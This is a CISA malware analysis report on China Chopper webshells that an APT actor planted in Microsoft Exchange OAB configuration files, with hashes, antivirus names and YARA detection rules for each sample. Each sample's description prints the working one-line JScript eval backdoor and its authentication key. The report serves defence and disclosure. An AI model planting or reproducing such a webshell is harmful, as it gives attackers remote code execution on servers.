Malware Analysis Report (AR22-277C)

MAR-10365227-3.v1 China Chopper Webshells

Click to Tweet.
Click to send to Facebook.
Click to Share.

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Summary

Description

This Malware Analysis Report (MAR) is the result of analytic efforts by the Cybersecurity and Infrastructure Security Agency (CISA) to provide detailed analysis of files associated with "China Chopper" webshells. CISA obtained China Chopper malware samples during an on-site incident response engagement at a Defense Industrial Base (DIB) Sector organization compromised by advanced persistent threat (APT) actors.

CISA analyzed 15 files associated with China Chopper malware. The files are modified Offline Address Book (OAB) Virtual Directory (VD) configuration files for Microsoft Exchange servers. The files have been modified with a variant of the China Chopper webshell. The webshells allow an attacker to remotely access the server and execute arbitrary code on the system(s).

For more information on the confirmed compromise, see Joint CSA: Impacket and Exfiltration Tool Used to Steal Sensitive Information from Defense Industrial Base Organization.

Download the STIX version of this report: MAR-10365227.r3.v1.WHITE_stix, 3.2 MB

Submitted Files (15)

07208095feb011ed915a881b689d6b70c352d40e90131df2c2abc92c4b93fbd9 (a96r741S.aspx)

1435e7871e32779a81e28aa9b6fa57949439220527ed3b3fb83a1c0699f376e3 (cBP0VKYG.aspx)

1e05b263cfea600f727614e58646a2ff6a4c89a4499e2410f23bf40c718a94d3 (ZyphzweO.aspx)

1f5f5b8dd702da3628e8612d44563d8267fa160048a0da389ee821152ac658f2 (nypCBAQf.aspx)

3918f060a7df3ef3488f4158b56cd720e1e4872f1c5a075df5870164260af650 (vsaUptfA.aspx)

411fef05a37e286a4e48700e5155cd55672cce4c9283b448d968391267b4f866 (pRd3rIlG.aspx)

53c7c1bf8526bb7a6d0af1fd7c7673a8138db90bb81b786f3987b9d854697f6c (vqk8w97H.aspx)

58a6151413f281143a9390852b017b82ff40d402cdbc8295aa58ae46c4c8424f (ydRlt1rF.aspx)

a58c4fdb1c31100f4e9bb530af7d1ac57c715fee1c7c5e6c790e1e9cc863cfe4 (0GPd9cCt.aspx)

a8c656d12b10d4fae74efc4cc7e585f5569f1a9144ebf6cd56b1bfed0dd7a440 (undMk5U9.aspx)

b8a06eae7d57a292dfea9000f76c6e3733b3567ef67d75b149dfd1d001ca9fb8 (AXYD37GQ.aspx)

dc21ee9606505222dbfe26d6bfc2a4dbebecf620d72fc39d298a5de519c3535f (PcyJLpmw.aspx)

dfa9f4a054636750012e0ff56286a3c96c37062959c8ac5b2df52e349de69e65 (GLuRqYO7.aspx)

e2caf75367ca300f616a96ff07769b1f80b69b1ae135fa27b79376a75a905b5e (mDweIri6.aspx)

e5451de048d7b9d6d8e699da7a10c38079eda4e6328580a8ba259a22eeaaa71d (vyBcbDLQ.aspx)

Findings

b8a06eae7d57a292dfea9000f76c6e3733b3567ef67d75b149dfd1d001ca9fb8

Tags

trojanwebshell

Details
Name AXYD37GQ.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 b5be2d3f0ebbb9a0925236f171c5b5e0
SHA1 1c2526572d10d3577802c15125d9c3a701c48919
SHA256 b8a06eae7d57a292dfea9000f76c6e3733b3567ef67d75b149dfd1d001ca9fb8
SHA512 3f5cd073f05c581c46973213e0aebaf3240c1336593901fc66abd3fb79ce70464d45d77629e5e88ec16a3d3fff9f4079807b41aa35401b5ba3ab63406484879c
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMaXVMr6j71idfhphE5g8RMlF62E4ONF0qDe8+:kNrdepN1BXS0HM5QZphEGs4ONF0qi
Entropy 4.646463
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.A8133255
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.A8133255 (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.A8133255
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }
           $s1 = { 65 76 61 6C 28 }
           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }
           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
       condition:
           $s0 or ($s1 and $s2) or ($s3 and $s4)
    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }
           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }
           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }
       condition:
           $s0 and $s1 and $s2
    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.

In this file, the ExternalUrl designation that normally specifies the Uniform Resource Locator (URL) used to connect to the VD from outside the firewall has been replaced with the following code:

---Begin Webshell---
hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["47YyATOi91Po"],"unsafe");)</script>
---End Webshell---

The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "47YyATOi91Po" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots
Figure 1. -

Figure 1. -

53c7c1bf8526bb7a6d0af1fd7c7673a8138db90bb81b786f3987b9d854697f6c

Tags

trojanwebshell

Details
Name vqk8w97H.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 264b80ff5d873d630168f21892f27724
SHA1 ae0d3ca3f7bec5703f1bc554f9b57bcdda8022ba
SHA256 53c7c1bf8526bb7a6d0af1fd7c7673a8138db90bb81b786f3987b9d854697f6c
SHA512 7c3cee7a7151417b42eea859c8b5a5f01c9289f02a279d5874ed4ef2dfee15b9dfee012a4f1b050255883a6ce876e72db0047bb6519383d6b76e06f377c5918d
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMaHVMr6j71idfhphE5gQaqt62E4ONF0qbenf:kNrdepN1BXS0nM5QZphEZfs4ONF0qS
Entropy 4.651647
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.46E1E12C
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.46E1E12C (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.46E1E12C
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }
           $s1 = { 65 76 61 6C 28 }
           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }
           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
       condition:
           $s0 or ($s1 and $s2) or ($s3 and $s4)
    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }
           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }
           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }
       condition:
           $s0 and $s1 and $s2
    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.

In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:

---Begin Webshell---
hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["gmetqypJ4TUw"],"unsafe");)</script>
---End Webshell---

The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "gmetqypJ4TUw" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots
Figure 2. -

Figure 2. -

dc21ee9606505222dbfe26d6bfc2a4dbebecf620d72fc39d298a5de519c3535f

Tags

trojanwebshell

Details
Name PcyJLpmw.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 d07539a27792c1a1d37dc0b7c5fa0f40
SHA1 82809edc726101e5baea2ae70bcd9cf2e20bdffa
SHA256 dc21ee9606505222dbfe26d6bfc2a4dbebecf620d72fc39d298a5de519c3535f
SHA512 bf9afaa2f2fe07708d17f8f5d73638e9df85301e714d7aeae302c14b17fbc3be619ac150330ee302b06bffd1d3b6fc8c1a16ebee62ed353ccf4c3ffcfa636c6c
ssdeep 24:yd53SzMaPfVMNGy1Qcz+rJdrde9j3yhm6jq6j71idfhphE5Jl+62E4ONF0qTenf:S53/gMyfrdepiz95QZphEfgs4ONF0q6
Entropy 4.649797
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.9109FA0F
ClamAV Asp.Trojan.Webshell0321-9840176-0
ESET ASP/Webshell.DI trojan
Emsisoft Generic.ASP.WebShell.H.9109FA0F (B)
Lavasoft Generic.ASP.WebShell.H.9109FA0F
McAfee Exploit-CVE2021-27065.d
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }
           $s1 = { 65 76 61 6C 28 }
           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }
           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
       condition:
           $s0 or ($s1 and $s2) or ($s3 and $s4)
    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }
           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }
           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }
       condition:
           $s0 and $s1 and $s2
    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.

In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:

---Begin Webshell---
hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["49tWiczXqjDb"],"unsafe");)</script>
---End Webshell---

The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "49tWiczXqjDb" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots
Figure 3. -

Figure 3. -

3918f060a7df3ef3488f4158b56cd720e1e4872f1c5a075df5870164260af650

Tags

trojanwebshell

Details
Name vsaUptfA.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 5cbd52c0a7517ddcd8a0e764131bd791
SHA1 f44cecce75f74b62a6596872b8dd86dbca2a59a8
SHA256 3918f060a7df3ef3488f4158b56cd720e1e4872f1c5a075df5870164260af650
SHA512 96a369b1d92385e1875ce64058c5875c27afdf10dc9163aa38a72a905b77202d17620f2b5ca269404d5f7f165c79b39ffff355a0834cf9d35944b28df4069230
ssdeep 48:kNrdepN1BXS0kwM5QZphEETs4ONF0qdwY:ktde/1yEANCqdwY
Entropy 4.647264
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.6D98F430
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.6D98F430 (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.6D98F430
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }
           $s1 = { 65 76 61 6C 28 }
           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }
           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
       condition:
           $s0 or ($s1 and $s2) or ($s3 and $s4)
    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }
           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }
           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }
       condition:
           $s0 and $s1 and $s2
    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.

In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:

---Begin Webshell---
hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["OUZz8HlharTm"],"unsafe");)</script>
---End Webshell---

The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "OUZz8HlharTm" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots
Figure 4. -

Figure 4. -

07208095feb011ed915a881b689d6b70c352d40e90131df2c2abc92c4b93fbd9

Tags

trojanwebshell

Details
Name a96r741S.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 bd01f935103002ccf3a21c9815697c24
SHA1 7517f601fc648bb731961d492b638f4d39e698fa
SHA256 07208095feb011ed915a881b689d6b70c352d40e90131df2c2abc92c4b93fbd9
SHA512 a38c05fa1814cebdfea51520eabf7c133d229b7c6aadd1792e2cffcd29d733c7d590411f6881573087c1fdc82e6293e32eab7cc42fe3b7c908ca0d4ca89f527e
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMaVfVMr6j71idfhphE5gMPAF62E4ONF0qHenf:kNrdepN1BXS01M5QZphEJes4ONF0qe
Entropy 4.647271
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.CCB2735F
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.CCB2735F (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.CCB2735F
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }
           $s1 = { 65 76 61 6C 28 }
           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }
           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
       condition:
           $s0 or ($s1 and $s2) or ($s3 and $s4)
    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }
           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }
           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }
       condition:
           $s0 and $s1 and $s2
    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.

In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:

---Begin Webshell---
hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["xncSsoZepUEz"],"unsafe");)</script>
---End Webshell---

The script within the file decodes and executes data using the JavaScript "eval" function. The hard-coded key, "xncSsoZepUEz" is used for authentication. If successful at accessing the script, the attacker will be able to execute commands on the page with server (system) level privileges.

Screenshots
Figure 5. -

Figure 5. -

1435e7871e32779a81e28aa9b6fa57949439220527ed3b3fb83a1c0699f376e3

Tags

trojanwebshell

Details
Name cBP0VKYG.aspx
Size 2167 bytes
Type HTML document, ASCII text, with CRLF line terminators
MD5 d67c8e0b4489979922c5acfff7211186
SHA1 3179101b5d8484a3cb316fb22e4e6aaa60eda94d
SHA256 1435e7871e32779a81e28aa9b6fa57949439220527ed3b3fb83a1c0699f376e3
SHA512 97e068cab67cb8b597c052ef4905cffc506d97fe1069f9195dbcc882b4808088e83ac37f430f2d43096ff40a8db1e03a133a54ae2fdaf22a33bbfb393a395e57
ssdeep 24:kNrde9j3a+rJTh91QcFdyW6j0SzMaEDVMr6j71idfhphE5gh62E4ONF0qTenf:kNrdepN1BXS0zaM5QZphEws4ONF0q6
Entropy 4.643343
Antivirus
Avira EXP/CVE-2021-27065.1
Bitdefender Generic.ASP.WebShell.H.E4D70A09
ClamAV Asp.Trojan.Webshell0321-9840176-0
Cyren ASP/CVE-2021-27065.A.gen!Camelot
Emsisoft Generic.ASP.WebShell.H.E4D70A09 (B)
IKARUS Exploit.ASP.CVE-2021-27065
Lavasoft Generic.ASP.WebShell.H.E4D70A09
McAfee Exploit-CVE2021-27065.a
NANOAV Exploit.Script.CVE-2021-26855.iwqhlf
Quick Heal CVE-2021-26855.Webshll.41350
Sophos Troj/WebShel-L
Symantec Trojan.Chinchop
Trend Micro Backdoo.43A0A8D2
Trend Micro HouseCall Backdoo.43A0A8D2
YARA Rules
  • rule CISA_10328929_01 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 65 76 61 6C 28 52 65 71 75 65 73 74 5B 22 [1-32] 5D 2C 22 75 6E 73 61 66 65 22 29 }
           $s1 = { 65 76 61 6C 28 }
           $s2 = { 28 52 65 71 75 65 73 74 2E 49 74 65 6D 5B [1-36] 5D 29 29 2C 22 75 6E 73 61 66 65 22 29 }
           $s3 = { 49 4F 2E 53 74 72 65 61 6D 57 72 69 74 65 72 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
           $s4 = { 57 72 69 74 65 28 52 65 71 75 65 73 74 2E 46 6F 72 6D 5B [1-24] 5D }
       condition:
           $s0 or ($s1 and $s2) or ($s3 and $s4)
    }
  • rule CISA_10328929_02 : trojan webshell exploit HAFNIUM CVE_2021_27065
    {
       meta:
           Author = "CISA Code & Media Analysis"
           Incident = "10328929"
           Date = "2021-03-17"
           Last_Modified = "20210317_2200"
           Actor = "n/a"
           Category = "Trojan WebShell Exploit"
           Family = "HAFNIUM CVE-2021-27065"
           Description = "Detects HAFNIUM webshell samples"
           MD5_1 = "ab3963337cf24dc2ade6406f11901e1f"
           SHA256_1 = "c8a7b5ffcf23c7a334bb093dda19635ec06ca81f6196325bb2d811716c90f3c5"
       strings:
           $s0 = { 4F 66 66 6C 69 6E 65 41 64 64 72 65 73 73 42 6F 6F 6B 73 }
           $s1 = { 3A 20 68 74 74 70 3A 2F 2F [1] 2F }
           $s2 = { 45 78 74 65 72 6E 61 6C 55 72 6C 20 20 20 20 }
       condition:
           $s0 and $s1 and $s2
    }
ssdeep Matches

No matches found.

Description

This artifact is a Microsoft Exchange OAB configuration file. The OAB VD is utilized to access Microsoft Exchange offline address lists. For this file, the OAB ExternalUrl parameter has been modified by a remote operator to include a "China Chopper" webshell that is likely an attempt to gain unauthorized access for dynamic remote code execution against the Exchange server. The OAB ExternalUrl parameter was configured to accept JavaScript code, which will be directly executed on the target server. The modification of the parameter suggests the operator can dynamically submit queries to this Exchange OAB VD.

In this file, the ExternalUrl designation that normally specifies the URL used to connect to the VD from outside the firewall has been replaced with the following code:

---Begin Webshell---
hxxp[:]//f/<script language="JScript" runat="server">function Page_Load() (eval (Request["fYQMESigLnP1"],"unsafe");)</script>
---End Webshell---

